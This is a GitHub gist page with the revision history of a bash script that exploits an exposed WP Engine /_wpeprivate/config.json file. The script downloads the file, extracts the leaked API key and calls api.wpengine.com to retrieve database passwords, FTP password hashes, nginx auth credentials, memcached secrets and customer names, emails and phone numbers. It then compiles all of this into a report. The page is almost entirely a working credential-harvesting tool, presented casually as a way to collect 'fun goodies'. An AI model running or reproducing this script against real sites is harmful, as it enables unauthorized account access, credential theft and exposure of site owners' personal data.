Skip to content

Instantly share code, notes, and snippets.

@xrmr

xrmr/wpeprivate-config.sh

Forked from hateshape/wpeprivate-config.sh
Created January 11, 2025 12:36
Show Gist options
  • Save xrmr/3131002644bb249d45ce461fe44a612a to your computer and use it in GitHub Desktop.
Save xrmr/3131002644bb249d45ce461fe44a612a to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @hateshape hateshape revised this gist May 5, 2019. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion wpeprivate-config.sh
    View file
    Original file line number Diff line number Diff line change
    @@ -44,7 +44,7 @@ echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt
    jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt

    echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt
    grep -E '(gophpr_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt
    grep -E '(gopher_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt

    echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt
    echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
  2. @hateshape hateshape created this gist Jan 22, 2019.
    59 changes: 59 additions & 0 deletions wpeprivate-config.sh
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,59 @@
    #!/bin/bash
    # If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
    # If it "no worked" (Technical Term) then you probably need to install jq!

    TARGET=$1
    TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)

    # Pretty Colors
    RESET='\033[00m'
    GREEN='\033[01;32m'
    BLUE='\033[01;34m'

    echo -e ${BLUE}"------------------------ Downloading '_wpeprivate/config.json' -------------------------"${RESET}
    echo -e ${GREEN}"curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json"${RESET}
    curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json

    WPEAPIKEY=$(jq '.' $TARGETDOMAIN-config.json | grep wpengine_apikey | awk '{print $2}' | cut -d, -f1 | sed 's/"//g')
    ACCOUNTNAME=$(jq '.' $TARGETDOMAIN-config.json | grep WPENGINE_ACCOUNT | awk '{print $2}' | cut -d, -f1 | sed 's/"//g' | sort -u)

    echo -e ${BLUE}"\n-------------------------- Make 1st API Call to api.wpengine.com -----------------------"${RESET}
    echo -e ${GREEN}"curl -so $ACCOUNTNAME-site.json -k https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
    curl -so $ACCOUNTNAME-site.json -k "https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"

    echo -e ${BLUE}"\n-------------------------- Make 2nd API Call to api.wpengine.com -----------------------"${RESET}
    echo -e ${GREEN}"curl -so $ACCOUNTNAME-customer.json -k https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
    curl -so $ACCOUNTNAME-customer.json -k "https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"

    echo -e ${BLUE}"\n----------------------------- Report - $(echo $TARGETDOMAIN) - $(echo $ACCOUNTNAME) -----------------------------"${RESET}
    echo -e ${BLUE}"Configuration Info - "${GREEN} >> $ACCOUNTNAME-report.txt
    grep -E '(site)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
    grep -E '(server_name)|(wp_version)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt

    echo -e ${BLUE}"\nDomains - "${GREEN} >> $ACCOUNTNAME-report.txt
    jq -r '.all_domains' $ACCOUNTNAME-site.json | sed ':a;N;$!ba;s/\n//g' | sed 's|[{}"[]||g' | sed 's/ //g' | cut -d] -f1 >> $ACCOUNTNAME-report.txt
    echo -e ${BLUE}"\nDatabase Infos - "${GREEN} >> $ACCOUNTNAME-report.txt
    echo "db_password:"$(jq -r '.db_password' $ACCOUNTNAME-site.json) >> $ACCOUNTNAME-report.txt
    echo -e "db_password_encryption" >> $ACCOUNTNAME-report.txt
    jq -r '.db_password_encryption' $ACCOUNTNAME-site.json | sed -e $'s/,/\\\n/g' | sed 's|[{}",]||g' >> $ACCOUNTNAME-report.txt

    echo -e ${BLUE}"\nFTP Users and Password Hashes - "${GREEN} >> $ACCOUNTNAME-report.txt
    jq '.ftp_users | to_entries[]' $ACCOUNTNAME-site.json | sed 's|[{},]||g' | awk '{print $1 $2}' | sed 's/"//g' | grep -vE '(value:)|(^$)' | sed 's/path:/&\n/g' >> $ACCOUNTNAME-report.txt

    echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt
    jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt

    echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt
    grep -E '(gophpr_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt

    echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt
    echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
    echo "account_id:"$(jq -r '.account_id' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
    echo "account_type:"$(jq -r '.account_type' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
    echo "full_name:"$(jq -r '.full_name' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
    echo "email:"$(jq -r '.email' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
    echo "phone:"$(jq -r '.phone' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt

    echo -e ${GREEN}
    cat $ACCOUNTNAME-report.txt
    echo -e ${BLUE}"----------------------------------------------------------------------------------------"${RESET}